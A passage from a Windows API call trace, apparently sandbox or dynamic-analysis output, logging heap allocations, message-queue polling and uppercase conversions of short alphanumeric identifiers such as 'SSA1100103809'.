Size=0x4) returned 0x2a724f8 [0221.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0221.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0221.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0221.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0221.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0221.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0221.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0221.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0221.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0221.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0221.754] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0221.755] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0221.755] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0221.755] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0221.755] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0221.756] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0221.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab860 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748b0 [0221.756] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0221.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0221.756] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0221.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0221.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0221.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0221.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0221.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0221.757] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0221.757] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748b0 | out: hHeap=0x2af0000) returned 1 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0221.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0221.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0221.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0221.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0221.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0221.758] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0221.758] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0221.758] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0221.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0221.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7a0 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74430 [0221.758] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0221.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0221.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0221.759] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0221.759] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0221.759] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0221.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0221.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0221.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0221.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0221.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0221.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0221.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0221.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0221.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.760] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74430 | out: hHeap=0x2af0000) returned 1 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0221.760] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0221.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0221.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0221.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0221.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0221.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0221.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0221.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0221.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0221.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0221.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0221.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0221.761] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab980 [0221.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0221.761] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0221.761] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0221.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.762] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0221.762] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0221.762] 